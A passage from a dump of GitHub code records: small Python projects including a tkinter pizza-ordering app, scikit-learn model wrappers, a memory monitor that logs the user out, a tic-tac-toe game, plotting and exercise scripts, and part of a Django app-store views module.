Image\n\n\n#creating tkinter window\ndef print_selected_items():\n\n for i in Pizza_List.curselection():\n print(Pizza_List.get(i))\n print(drinks.get())\nPizza = Tk()\n\ndef call_back_add_pizza():\n print(\"*********Def add Pizza\")\n print_selected_items()\n\nPizza.geometry(\"700x600\")\nPizza.title(\"MY Pizza App\")\n# Create the textboxes\n# the purpose here is to add the customers info to the system\nname_Label = Label(Pizza, 
text=\"Type your name? \")\nname_Label.grid(row=0, column=0)\n\nname_entry = Entry(Pizza, width=25)\nname_entry.grid(row=0, column=1)\n# this entry collects the customer's address\naddress_Label = Label(Pizza, text=\"Type your address? \")\naddress_Label.grid(row=1, column=0)\n\naddress_entry = Entry(Pizza, width=25)\naddress_entry.grid(row=1, column=1)\n# this entry collects the customer's phone number\nphone_Label = Label(Pizza, text=\"Enter your phone number? \")\nphone_Label.grid(row=2, column=0)\n\nphone_entry = Entry(Pizza, width=25)\nphone_entry.grid(row=2, column=1)\n\n#Our Pizza list\n# this listbox lets the customer pick the pizza toppings\nmy_Pizza_List = [\"Cheese\", \"Veggie\", \"Pepperoni\", \"Mushroom\", \"Chicken\", \"Beef\", \"Olive\", \"Steak\"]\n\n\n\nPizza_List = Listbox(Pizza, selectmode=MULTIPLE, bg=\"white\", fg=\"black\")\nPizza_List.grid(row=4, column=1)\n\nfor item in my_Pizza_List:\n    Pizza_List.insert(0, item)\n#Create button\n# this button adds the selected pizza to the order\nadd_button = Button(Pizza, text=\"Add pizza\",command = call_back_add_pizza)\nadd_button.grid(row=5,column=0)\n\n# this callback shows the customer's info on screen\ndef check():\n    text1 = name_entry.get()\n    new_lbl = Label(Pizza, text=\"Name: \" + text1)\n    new_lbl.grid(row=5,column=2)\n\n    text2 = address_entry.get()\n    new_lbl2 = Label(Pizza, text=\"Address: \" + text2)\n    new_lbl2.grid(row=6,column=2)\n\n    text3 = phone_entry.get()\n    new_lbl3 = Label(Pizza, text=\"Phone Number: \" + text3)\n    new_lbl3.grid(row=7,column=2)\n\n\n##this button displays all the customer's information such as name, address and phone number\ncheck_button = Button(Pizza, text=\"Checkout\", command=check)\ncheck_button.grid(row=6,column=0)\n#this button lets the customer delete the pizzas if they want to change the toppings\ndef deleteme():\n    Pizza_List.delete(0,7)\n\ndel_button = Button(Pizza, text=\"Delete Pizza\", command=deleteme)\ndel_button.grid(row=7,column=0)\n#this drop-down lets the customer pick a drink\ndrinks = StringVar()\ndrinks.set(\"Choose a drink\")\n\ndrink = OptionMenu(Pizza, drinks, \"coca\", \"Fanta\", \"Root Beer\", \"Sprite\", \"Lemonade\",) # add a command here to print the value to the screen\ndrink.grid(row=8,column=0)\n#here adding picture number1 using PIL\nimg = Image.open(\"pizza.png.jpg\")\nimg = img.resize((180, 180))\npizza_pic = ImageTk.PhotoImage(img)\nlabel = Label(Pizza, image=pizza_pic)\nlabel.image = pizza_pic\n\nlabel.place(x=450, y=20)\n##here adding picture number2 using PIL\nimg = Image.open(\"Pizza23.png\")\nimg = img.resize((180, 180))\npizza_pic = ImageTk.PhotoImage(img)\nlabel = Label(Pizza, image=pizza_pic)\nlabel.image = pizza_pic\n\nlabel.place(x=450, y=400)\n\n#exit button\n# this button lets the customer exit the app once they are done ordering\ndef exitout():\n    answer = messagebox.askyesno(\"Exit\", \"Are you sure, you want to exit?\")\n    if answer == 1:\n
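        # askyesno() returns a bool, so comparing against 1 works; destroy() closes the root window\n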
Pizza.destroy()\n else:\n return\n\nexit_button = Button(Pizza, text=\"Exit out\", command=exitout)\nexit_button.grid(row=1, column=7)\n\n\n\nPizza.mainloop()\n","repo_name":"ojawad/Osamah-Jawad-Final-Project","sub_path":"PIZZA GUI APP.py","file_name":"PIZZA GUI APP.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73882145670","text":"#!/usr/bin/python\n# \n# Various ML models from scikit-learn\n#\n# includes:\n# LogisticRegression\n# SVM\n# KNN\n# NaiveBayes\n# Perceptron (1-layer NN)\n# Linear SVC\n# SGD\n# Decision Tree\n# Random Forest\n#\n# Author: Chaney Lin\n# Date: April 2018\n#\nimport pandas as pd\n\ndef runModel(model, X_train, Y_train, X_test):\n \"\"\"\n performs fitting of [model] using [X_train] and [Y_train]\n returns accuracy on training set, and predictions on [X_test]\n \"\"\"\n model.fit(X_train, Y_train)\n Y_pred = model.predict(X_test)\n accuracy = round(model.score(X_train, Y_train) * 100, 2)\n return accuracy, Y_pred\n\ndef runLogisticRegression(X_train, Y_train, X_test):\n \"\"\"\n runs logistic regression\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.linear_model import LogisticRegression\n \n logreg = LogisticRegression()\n return runModel(logreg, X_train, Y_train, X_test)\n\ndef runSVM(X_train, Y_train, X_test):\n \"\"\"\n runs support vector machine\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.svm import SVC\n \n svc = SVC()\n return runModel(svc, X_train, Y_train, X_test)\n\ndef runKNN(X_train, Y_train, X_test, n_neighbors = 3):\n \"\"\"\n runs K-nearest neighbors (input K)\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.neighbors import KNeighborsClassifier\n \n knn = KNeighborsClassifier(n_neighbors = n_neighbors)\n return runModel(knn, X_train, Y_train, X_test)\n\ndef runNaiveBayes(X_train, Y_train, X_test):\n \"\"\"\n runs Naive Bayes\n returns accuracy on training set, and predictions\n \"\"\"\n from sklearn.naive_bayes import GaussianNB\n \n gaussian = GaussianNB()\n return runModel(gaussian, X_train, Y_train, X_test)\n\ndef runPerceptron(X_train, Y_train, X_test):\n \"\"\"\n runs Perceptron (i.e. 
single layer NN)\n    returns accuracy on training set, and predictions\n    \"\"\"\n\n    from sklearn.linear_model import Perceptron\n\n    perceptron = Perceptron()\n    return runModel(perceptron, X_train, Y_train, X_test)\n\ndef runLinearSVC(X_train, Y_train, X_test):\n    \"\"\"\n    runs linear SVC\n    returns accuracy on training set, and predictions\n    \"\"\"\n\n    from sklearn.svm import SVC, LinearSVC\n\n    linear_svc = LinearSVC()\n    return runModel(linear_svc, X_train, Y_train, X_test)\n\ndef runSGD(X_train, Y_train, X_test):\n    \"\"\"\n    runs stochastic gradient descent\n    returns accuracy on training set, and predictions\n    \"\"\"\n    from sklearn.linear_model import SGDClassifier\n\n    sgd = SGDClassifier()\n    return runModel(sgd, X_train, Y_train, X_test)\n\ndef runDecisionTree(X_train, Y_train, X_test):\n    \"\"\"\n    runs decision tree\n    returns accuracy on training set, and predictions\n    \"\"\"\n\n    from sklearn.tree import DecisionTreeClassifier\n\n    decision_tree = DecisionTreeClassifier()\n    return runModel(decision_tree, X_train, Y_train, X_test)\n\ndef runRandomForest(X_train, Y_train, X_test, n_estimators = 300):\n    \"\"\"\n    runs random forest with [n_estimators] estimators\n    returns accuracy on training set, and predictions\n    \"\"\"\n\n    from sklearn.ensemble import RandomForestClassifier\n\n    random_forest = RandomForestClassifier(n_estimators=n_estimators)  # honor the caller-supplied value instead of a hard-coded 300\n    return runModel(random_forest, X_train, Y_train, X_test)\n\ndef runAll(X_train, Y_train, X_test, n_neighbors = 3, n_estimators = 300):\n    \"\"\"\n    runs all models\n    optional inputs are number of neighbors (for KNN) and number of estimators (for random forest)\n    \"\"\"\n\n    modelnames = ['Support Vector Machines', 'KNN', 'Logistic Regression', \n                  'Random Forest', 'Naive Bayes', 'Perceptron', \n                  'Stochastic Gradient Descent', 'Linear SVC', \n                  'Decision Tree']\n\n    acc = []\n    pred = []\n\n    svm = runSVM(X_train, Y_train, X_test)\n    knn = runKNN(X_train, Y_train, X_test, n_neighbors = n_neighbors)\n    logreg = runLogisticRegression(X_train, Y_train, X_test)\n    random_forest = runRandomForest(X_train, Y_train, X_test, n_estimators = n_estimators)\n    naive_bayes = runNaiveBayes(X_train, Y_train, X_test)\n    perceptron = runPerceptron(X_train, Y_train, X_test)\n    sgd = runSGD(X_train, Y_train, X_test)\n    linear_svc = runLinearSVC(X_train, Y_train, X_test)\n    decision_tree = runDecisionTree(X_train, Y_train, X_test)\n\n    for results in [svm, knn, logreg, random_forest, naive_bayes, perceptron, sgd, linear_svc, decision_tree]:\n        acc.append(results[0])\n        pred.append(results[1])\n\n    models = pd.DataFrame({\n        'Model': modelnames,\n        'Score': acc,\n        'Predictions': pred})\n\n    return models.sort_values(by='Score', ascending=False)","repo_name":"clin-projects/kaggle-titanic","sub_path":"ML_models.py","file_name":"ML_models.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"36623667272","text":"from sys import argv\n\nscript, user_name = argv\nprompt = '>'\n\nprint(user_name, script)\nprint(\"Do you like me \" + user_name + \"?\")\nlikes = input(prompt)\n\nprint(\"Where do you live \" + user_name + \"?\")\nlives = input(prompt)\n\nprint(\"\"\"\nSo you said {:s} about liking me.\nYou live in {:s}.\n\"\"\".format(likes, lives))\n\nprint(\"Script: \", script)\n\nage = int(input(\"Age? 
\"))\nprint(\"Age*2: \", age*2)\n\n\n","repo_name":"mrkajetanp/learning-programming","sub_path":"Python/Learning/Language/arg_ex.py","file_name":"arg_ex.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
{"seq_id":"37203168778","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 26 14:53:47 2019\n\n@author: ZR\n\nThis code monitors the operating system's memory usage. If less than 5% of memory stays usable, it forces the current user to log out.\n\"\"\"\n\n\nfrom psutil import virtual_memory\nimport time\nimport os\n\n# truncate the log once at startup, then append on every sample\nf = open('Log_File.txt','w')\nf.close()\n\nwhile 1:\n    # re-sample memory on every iteration; reading it once before the loop\n    # would log the same stale percentage forever\n    mem = virtual_memory()\n    usage_percent = mem.percent\n    f = open('Log_File.txt','a')\n    print('Current Used Memory Percent is:'+str(usage_percent)+'%')\n    f.write(str(usage_percent)+'\\n')\n    time.sleep(1)\n    if usage_percent>95:\n        now = int(round(time.time()*1000))\n        now_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(now/1000))\n        print('Memory Out!! Logging User Out at '+now_time)\n        f.close()\n        os.system(\"shutdown -l\")\n    else:\n        f.close()","repo_name":"adolescent/2P_Analysis","sub_path":"Other_Usage_Codes/Memory_Safety/Memory_Police.py","file_name":"Memory_Police.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
{"seq_id":"74125655431","text":"import csv\n\ndef PAVaccines(zip2): \n    sites = []\n    finalSites = \"Your nearest vaccination site(s) are: \"\n    with open('PAData.csv', mode='r') as csv_file:\n        csv_reader = csv.DictReader(csv_file)\n        line_count = 0\n        for row in csv_reader:\n            zipCode = row[\"ZIP Code\"]\n            if(int(zipCode) == int(zip2)):\n                sites.append(row[\"Clinic Name\"].capitalize() + \": \" + row[\"Street Address\"] + \" \" + row[\"City\"] + \", PA \" + row[\"ZIP Code\"])\n    #print(sites)\n    num = 0 \n    sites2 = [\"N/A\",\"N/A\",\"N/A\"] \n    while num < 3: \n        if(num > len(sites)-1): \n            break\n        sites2[num] = sites[num]\n        num+=1\n    return sites2\n","repo_name":"kshah2020/COVID19-Chatbot","sub_path":"csvreader.py","file_name":"csvreader.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"1825197999","text":"\ngameArr = ['-', '-', '-', '-', '-', '-', '-', '-', '-']\ncorr = {\n    '1 1': 0,\n    '1 2': 1,\n    '1 3': 2,\n    '2 1': 3,\n    '2 2': 4,\n    '2 3': 5,\n    '3 1': 6,\n    '3 2': 7,\n    '3 3': 8,\n}\n\n\ndef game():\n    player1 = input('Saisir le nom du joueur 1: ')\n    player1figure = 'Croix'\n    player2 = input('Saisir le nom du joueur 2: ')\n    player2figure = 'Ronds'\n\n    print('Joueur 1: ' + player1figure + ': ' + player1 )\n    print('Joueur 2: ' + player2 + '. 
' + player2figure) \n \n currentPlayer = ''\n \n for i in range(len(gameArr)):\n if i == 2 or i == 5:\n print(gameArr[i])\n else:\n print(gameArr[i], end=\" \")\n\n while True: \n isPlayer1 = currentPlayer == player2 or currentPlayer == \"\"\n currentPlayer = player1 if isPlayer1 else player2 \n \n turn = input(currentPlayer + ' joue: ')\n for key in corr:\n if turn not in corr:\n turn = input('Merci de saisir le nombre correct!')\n if key == turn:\n if gameArr[corr[key]] == 'X' or gameArr[corr[key]] == 'O':\n turn = input('Cette case a déjà été utilisée!!!')\n else:\n gameArr[corr[key]] = 'X' if currentPlayer == player1 else 'O'\n \n for i in range(len(gameArr)):\n if i == 2 or i == 5:\n print(gameArr[i])\n else:\n print(gameArr[i], end=\" \") \n\n if didSmbWin(gameArr):\n break \n\n print(currentPlayer + ' wins!!!')\n writeInFile(currentPlayer) \n \ndef didSmbWin(array):\n if (array[0] == array[1] == array[2] == 'X' or\n array[0] == array[1] == array[2] == 'O'):\n return True\n elif (array[0] == array[3] == array[6] == 'X' or\n array[0] == array[3] == array[6] == 'O'):\n return True\n elif (array[0] == array[4] == array[8] == 'X' or\n array[0] == array[4] == array[8] == 'O'):\n return True\n elif (array[1] == array[4] == array[7] == 'X' or\n array[1] == array[4] == array[7] == 'O'):\n return True\n elif (array[2] == array[5] == array[8] == 'X' or\n array[2] == array[5] == array[8] == 'O'):\n return True\n elif (array[2] == array[4] == array[6] == 'X' or\n array[2] == array[4] == array[6] == 'O'):\n return True\n elif (array[3] == array[4] == array[5] == 'X' or\n array[3] == array[4] == array[5] == 'O'):\n return True\n elif (array[6] == array[7] == array[8] == 'X' or\n array[6] == array[7] == array[8] == 'O'):\n return True\n\ndef writeFile(user):\n with open(\"./files/morpion.txt\", 'r+') as file:\n lines = file.readlines() \n\n def changeItem(item):\n dividedLine = item.split(\" \")\n if dividedLine[0] == user: \n victoriesNumber = int(dividedLine[1]) \n victoriesNumber += 1 \n newline = dividedLine[0] + ' ' + str(victoriesNumber) + ' \\n'\n return newline\n else:\n return item \n \n newLines = \"\".join(list(map(changeItem, lines))) \n file.close()\n\n newFile = open(\"./files/morpion.txt\", 'wt')\n newFile.write(newLines)\n newFile.close()\n\ndef writeInFile(user):\n with open(\"./files/morpion.txt\", 'r+') as file:\n text = file.readlines()\n\n userExists = False\n for i in text:\n userName = i.split(\" \") \n if userName[0] == user:\n userExists = True\n \n if userExists:\n writeFile(user)\n else:\n file.write(user + ' 1 ' + '\\n')\n\n\ngame()","repo_name":"Evgvakh/starter-python","sub_path":"runtrack_project/morpion.py","file_name":"morpion.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1123995601","text":"#!/usr/bin/env python3\nimport os\nimport statistics\nfrom sys import argv\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\n\n'''-----------------------------------------------'''\n\ndef load_hist(filename):\n\thist = {}\n\n\tdata = {}\n\tn = 0; sum_ = 0\n\twith open(filename) as fh:\n\t\tfor line in fh:\n\t\t\tk, v = [ int(i) for i in line.split() ]\n\t\t\tdata[k] = v\n\t\t\tn += v; sum_ += k*v\n\n\tmean = sum_/n\n\tsq_sum = 0\n\tfor time in data:\n\t\tsq_sum += ((time-mean)**2)*data[time]\n\tstdev = (sq_sum / n)**0.5\n\n\thist['metadata'] = {}\n\thist['metadata']['avg'] = mean\n\thist['metadata']['stdev'] = stdev\n\n\thist['data'] = 
{}\n\thist['data']['filtered'] = {}\n\thist['data']['outliers'] = {}\n\tfor time in data:\n\t\t# keep samples within three standard deviations of the mean; the original\n\t\t# 'time <= mean + 3*stdev or time <= mean - 3*stdev' collapsed to the first\n\t\t# test alone and never routed low-side points into the outlier bucket\n\t\tif abs(time - mean) <= 3 * stdev:\n\t\t\thist['data']['filtered'][time] = data[time]\n\t\telse:\n\t\t\thist['data']['outliers'][time] = data[time]\n\n\treturn hist\n\ndef trunc_str(f):\n\treturn \"%.2f\" % f\n\n'''-----------------------------------------------'''\n\ntry:\n\tresult_dir = argv[1]\n\tcside_sysA = argv[2]\n\tjside_sysA = argv[3]\n\tcside_sysB = argv[4]\n\tjside_sysB = argv[5]\nexcept IndexError:\n\tprint(\"usage:\", argv[0], \"result_dir cside-systemA javaside-systemA cside-systemB javaside-systemB\")\n\texit(2)\n\nc = 'limegreen'\ne = 'black'\na = .9\n\nrectangle1 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\nrectangle2 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\n\ncside_sysA = load_hist(cside_sysA)\njside_sysA = load_hist(jside_sysA)\ncside_sysB = load_hist(cside_sysB)\njside_sysB = load_hist(jside_sysB)\n\nfig = plt.figure(constrained_layout=True)\nsubfigs = fig.subfigures (\n\tnrows=2,\n\tncols=1\n)\n\nsubfigs[0].suptitle('System A')\naxs = subfigs[0].subplots(nrows=1, ncols=2, sharex=True, sharey=True)\naxs[0].bar (\n\tcside_sysA['data']['filtered'].keys(),\n\tcside_sysA['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[0].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(cside_sysA['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(cside_sysA['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[0].set_title(\"C\")\naxs[1].bar (\n\tjside_sysA['data']['filtered'].keys(),\n\tjside_sysA['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[1].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(jside_sysA['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(jside_sysA['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[1].set_title(\"Java\")\n\n\n\nsubfigs[1].suptitle('System B')\naxs = subfigs[1].subplots(nrows=1, ncols=2, sharex=True, sharey=True)\naxs[0].bar (\n\tcside_sysB['data']['filtered'].keys(),\n\tcside_sysB['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[0].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(cside_sysB['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(cside_sysB['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[0].set_title(\"C\")\naxs[1].bar (\n\tjside_sysB['data']['filtered'].keys(),\n\tjside_sysB['data']['filtered'].values(),\n\tcolor = c, edgecolor = e, alpha = a\n)\naxs[1].legend ( \\\n\t[ \\\n\t\trectangle1, \\\n\t\trectangle2 \\\n\t], \\\n\t( \\\n\t\t\"x̄: \"+trunc_str(jside_sysB['metadata'] ['avg'] )+\" µsec\", \\\n\t\t\"σ: \"+trunc_str(jside_sysB['metadata']['stdev'])+\" µsec\" \\\n\t) \\\n)\naxs[1].set_title(\"Java\")\n\nfig.supxlabel('Run Time (usec)')\nfig.supylabel('Frequency')\n\nplt.savefig(\n\tos.path.join(\n\t\tresult_dir,\n\t\t'juxtaposed_compound'\n\t)\n)\n#\n# fig, axs = plt.subplots(1, 2, figsize=(10,5))\n#\n# rectangle1 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\n# rectangle2 = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False, edgecolor='none', linewidth=0)\n#\n# axs[0].bar (\n# \tcside['data']['filtered'].keys(),\n# \tcside['data']['filtered'].values(),\n# \tcolor = c, edgecolor = e, alpha = a\n# )\n# axs[0].legend (\n# \t[\n# \t\trectangle1,\n# \t\trectangle2\n# 
\t],\n# \t(\n# \t\t\"x̄: \"+trunc_str(cside['metadata'] ['avg'] )+\" µsec\",\n# \t\t\"σ: \"+trunc_str(cside['metadata']['stdev'])+\" µsec\"\n# \t)\n# )\n# axs[0].set_title(\"C\")\n#\n# axs[1].bar (\n# \tjavaside['data']['filtered'].keys(),\n# \tjavaside['data']['filtered'].values(),\n# \tcolor = c, edgecolor = e, alpha = a\n# )\n# axs[1].legend (\n# \t[\n# \t\trectangle1,\n# \t\trectangle2\n# \t],\n# \t(\n# \t\t\"x̄: \"+trunc_str(javaside['metadata'] ['avg'] )+\" µsec\",\n# \t\t\"σ: \"+trunc_str(javaside['metadata']['stdev'])+\" µsec\"\n# \t)\n# )\n# axs[1].set_title(\"Java\")\n# axs[1].set_yticks(axs[0].get_yticks()) # align y axis idiom\n#\n# fig.supxlabel('Time (μs)')\n# fig.supylabel('Frequency')\n#\n# # plt.show(); exit();\n\n\n\n\n","repo_name":"aservet1/jRAPL","sub_path":"tests/jmh/native-related-runtime/scripts/juxtopose-cside-javaside_compoundplots.py","file_name":"juxtopose-cside-javaside_compoundplots.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"2166911201","text":"\r\nstart = 1\r\nend = 100\r\ncountersteps = 1\r\n\r\nfor i in range(start, end, countersteps):\r\n\r\n if i % 3 == 0:\r\n print(str(i) + \" Fizz alfred yoyooyo\")\r\n \r\n if i % 5 == 0:\r\n print(str(i) + \" Buzz stein yoyoyoyo\")\r\n\r\n else:\r\n print(i)","repo_name":"ivers1en/Prosjekt_A","sub_path":"Teller1til100_sjekker3og5medModulo%.py","file_name":"Teller1til100_sjekker3og5medModulo%.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39918443833","text":"valorT=0\ncontador=0\nvalor=1\nwhile valor != 0:\n valor = float(input(\"Digite numero par:\"))\n if valor%2 ==0:\n contador +=1\n valorT=valorT+valor\n else: \n print (\"Isso é impar\")\n\nmedia= valorT/(contador-1)\nprint(media)\n","repo_name":"JuanSoftware/Lista_3","sub_path":"lista 3/Q7.py","file_name":"Q7.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8726417103","text":"class Solution:\n def longestValidParentheses(self, s: str) -> int:\n res = 0\n stack = []\n \n stack.append(-1)\n for i, char in enumerate(s):\n if char == '(':\n stack.append(i);\n else:\n #if encounter ) and stack becomes empty means invalid so we start a new substring search\n stack.pop()\n if not stack:\n stack.append(i)\n else:\n res = max(res, i-stack[-1])\n \n return res\n","repo_name":"b-knd/competitive-programming","sub_path":"practice/leetcode/32_LongestValidParentheses.py","file_name":"32_LongestValidParentheses.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73887344712","text":"from urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import get_language, get_language_info\nfrom django.views.decorators.http import etag\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom 
rest_framework.generics import ListAPIView\nfrom semantic_version import Version\n\nfrom nextcloudappstore.core.caching import app_etag\nfrom nextcloudappstore.core.facades import flatmap\nfrom nextcloudappstore.core.forms import (\n AppRatingForm,\n AppRegisterForm,\n AppReleaseUploadForm,\n)\nfrom nextcloudappstore.core.models import App, AppRating, Category\nfrom nextcloudappstore.core.serializers import AppRatingSerializer\nfrom nextcloudappstore.core.versioning import pad_min_version\n\n\n@etag(app_etag)\ndef app_description(request, id):\n app = get_object_or_404(App, id=id)\n return HttpResponse(app.description, content_type=\"text/plain\")\n\n\nclass AppRatingApi(ListAPIView):\n serializer_class = AppRatingSerializer\n\n def get_queryset(self):\n id = self.kwargs.get(\"id\")\n lang = self.request.GET.get(\"lang\", self.request.LANGUAGE_CODE)\n app = get_object_or_404(App, id=id)\n queryset = AppRating.objects.language(lang).filter(app=app)\n\n current_user = self.request.GET.get(\"current_user\", \"false\")\n if current_user == \"true\":\n return queryset.filter(user=self.request.user)\n else:\n return queryset\n\n\nclass AppDetailView(DetailView):\n queryset = App.objects.prefetch_related(\n \"releases\",\n \"screenshots\",\n \"co_maintainers\",\n \"translations\",\n ).select_related(\"owner\")\n template_name = \"app/detail.html\"\n slug_field = \"id\"\n slug_url_kwarg = \"id\"\n\n def post(self, request, id):\n form = AppRatingForm(request.POST, id=id, user=request.user)\n # there is no way that a rating can be invalid by default\n if form.is_valid() and request.user.is_authenticated:\n form.save()\n return redirect(\"app-detail\", id=id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[\"DISCOURSE_URL\"] = settings.DISCOURSE_URL.rstrip(\"/\")\n context[\"rating_form\"] = AppRatingForm(initial={\"language_code\": get_language()})\n\n ratings = AppRating.objects.filter(app=context[\"app\"])\n rating_languages = flatmap(lambda r: r.get_available_languages(), ratings)\n\n # make sure current session language is in the list even if there are\n # no comments.\n rating_languages = list(rating_languages)\n if get_language() not in rating_languages:\n rating_languages.append(get_language())\n\n context[\"languages\"] = set(sorted(rating_languages))\n context[\"fallbackLang\"] = \"en\" if \"en\" in context[\"languages\"] else \"\"\n context[\"user_has_rated_app\"] = False\n if self.request.user.is_authenticated:\n try:\n app_rating = AppRating.objects.get(user=self.request.user, app=context[\"app\"])\n\n # if parler falls back to a fallback language\n # it doesn't set the language as current language\n # and we can't select the correct language in the\n # frontend. So we try and find a languge that is\n # available\n language_code = app_rating.get_current_language()\n if not app_rating.has_translation(language_code):\n for fallback in app_rating.get_fallback_languages():\n if app_rating.has_translation(fallback):\n app_rating.set_current_language(fallback)\n\n # when accessing an empty comment django-parler tries to\n # fall back to the default language. However for comments\n # the default (English) does not always exist. 
Unfortunately\n # it throws the same exception as non existing models,\n # so we need to access it beforehand\n try:\n comment = app_rating.comment\n except AppRating.DoesNotExist:\n comment = \"\"\n\n context[\"rating_form\"] = AppRatingForm(\n {\n \"rating\": app_rating.rating,\n \"comment\": comment,\n \"language_code\": app_rating.get_current_language(),\n }\n )\n context[\"user_has_rated_app\"] = True\n except AppRating.DoesNotExist:\n pass\n context[\"categories\"] = Category.objects.prefetch_related(\"translations\").all()\n context[\"latest_releases_by_platform_v\"] = self.object.latest_releases_by_platform_v()\n context[\"is_integration\"] = self.object.is_integration\n return context\n\n\nclass AppReleasesView(DetailView):\n queryset = App.objects.prefetch_related(\n \"translations\",\n \"releases__translations\",\n \"releases__phpextensiondependencies__php_extension\",\n \"releases__databasedependencies__database\",\n \"releases__shell_commands\",\n \"releases__licenses\",\n )\n template_name = \"app/releases.html\"\n slug_field = \"id\"\n slug_url_kwarg = \"id\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.prefetch_related(\"translations\").all()\n\n releases = self.object.releases_by_platform_v()\n unstables = self.object.unstable_releases_by_platform_v()\n versions = set(list(releases.keys()) + list(unstables.keys()))\n all_releases = list(map(lambda v: (v, releases.get(v, []) + unstables.get(v, [])), versions))\n context[\"releases_by_platform_v\"] = self._sort_by_platform_v(all_releases)\n return context\n\n def _sort_by_platform_v(self, releases_by_platform, reverse=True):\n \"\"\"Sorts a list of tuples like (, [releases]) by\n platform version.\n\n :param releases_by_platform: A list of tuples.\n :param reverse: Descending order if True, ascending otherwise.\n :return sorted list of tuples.\n \"\"\"\n\n return sorted(releases_by_platform, reverse=reverse, key=lambda v: Version(pad_min_version(v[0])))\n\n\nclass CategoryAppListView(ListView):\n model = App\n template_name = \"app/list.html\"\n allow_empty = True\n\n def get_queryset(self):\n order_by = self.request.GET.get(\"order_by\", \"rating_overall\")\n ordering = self.request.GET.get(\"ordering\", \"desc\")\n is_featured = self.request.GET.get(\"is_featured\", False)\n maintainer = self.request.GET.get(\"maintainer\", False)\n sort_columns = []\n\n if self.kwargs.get(\"is_featured_category\", False):\n is_featured = \"true\"\n\n allowed_order_by = {\"name\", \"last_release\", \"rating_overall\", \"rating_recent\"}\n if order_by in allowed_order_by:\n if order_by == \"name\":\n order_by = \"translations__name\"\n if ordering == \"desc\":\n sort_columns.append(\"-\" + order_by)\n else:\n sort_columns.append(order_by)\n\n lang = get_language_info(get_language())[\"code\"]\n category_id = self.kwargs[\"id\"]\n queryset = (\n App.objects.search(self.search_terms, lang)\n .order_by(*sort_columns)\n .filter(Q(releases__gt=0) | (Q(is_integration=True) & Q(approved=True)))\n )\n if maintainer:\n try:\n user = User.objects.get_by_natural_key(maintainer)\n queryset = queryset.filter(Q(owner=user) | Q(co_maintainers=user))\n except ObjectDoesNotExist:\n return queryset.none()\n if category_id:\n queryset = queryset.filter(categories__id=category_id)\n if is_featured == \"true\":\n queryset = queryset.filter(is_featured=True)\n return queryset.prefetch_related(\"screenshots\", \"translations\")\n\n def get_context_data(self, **kwargs):\n 
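        # enrich the default list context with category, search and URL-parameter state for the template\n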
